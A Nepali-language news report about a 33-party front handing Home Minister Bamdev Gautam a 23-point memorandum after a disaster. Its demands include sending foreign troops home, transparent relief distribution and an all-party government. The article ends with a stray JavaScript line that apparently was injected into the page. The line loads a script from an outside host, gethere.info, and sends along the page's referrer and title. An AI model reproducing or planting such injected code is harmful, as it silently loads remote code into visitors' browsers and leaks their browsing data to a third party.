संबिधानसभा बाहिर रहेका ३३ दलीय राष्ट्रिय मोर्चा नेपालले राहत सहयोगका नाममा नेपालमा बिदेशी चलखेल हुन सकने भन्दै राष्ट्रियता र राष्ट्रिय अखण्डताप्रति सचेत गराउन भन्दै उपप्रधान एवं गृहमन्त्री बामदेव गौतमलाई ज्ञापन पत्र बुझाएको छ। बिहीबार सिंहदरबारमा मोर्चाले मन्त्री गौतमलाई बिभिन्न २३ बुदे माग सहितको ज्ञापन पत्र बुझाएको हो। ज्ञापन पत्र बुझाउदै मोर्चाले उद्धार कार्य सम्पन्न भईसकेको भन्दै बिदेशी सेना फिर्ता पठाउन माग गरेको छ।

त्यस्तै मृतक र घाईतेहरुसंग रहेका सम्पतीहरुको बिबरण सार्वजनिक गर्दे मृतकका आफन्तलाइ बुझाउनुपर्ने , बिदेशी तथा स्वदेशीहरुको राहत संकलन तथा बितरण कार्यलाई संयुक्त संयन्त्र मार्फत पारदशी बनाउन समेत मोर्चाले माग गरेको छ। मोर्चाले भविष्यमा हुन सकने दैवी प्रकोपको व्यबस्थापन नीति ल्याउनुपर्ने , बिदेशमा रहेका युवाहरुलाई स्वदेश फर्काइ राज्यको पुर्ननिर्माण कार्यमा लगाउनुपर्ने, बिदेशबाट आएका सामाग्रीहरुको केन्द्रिउ तथ्याङ्क सार्वजनिक गर्नुपर्ने , ३३ दलीय मोर्चा सहितको सर्वपक्षिय सरकार गठन हुनुपर्ने माघ अघि सारेको छ। ज्ञापन पत्र बुझ्दै गृहमन्त्री गौतमले मागका बिषयमा छलफल गर्दे निर्णयमा पुगीने आश्वासन दिनुभएको थियो।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;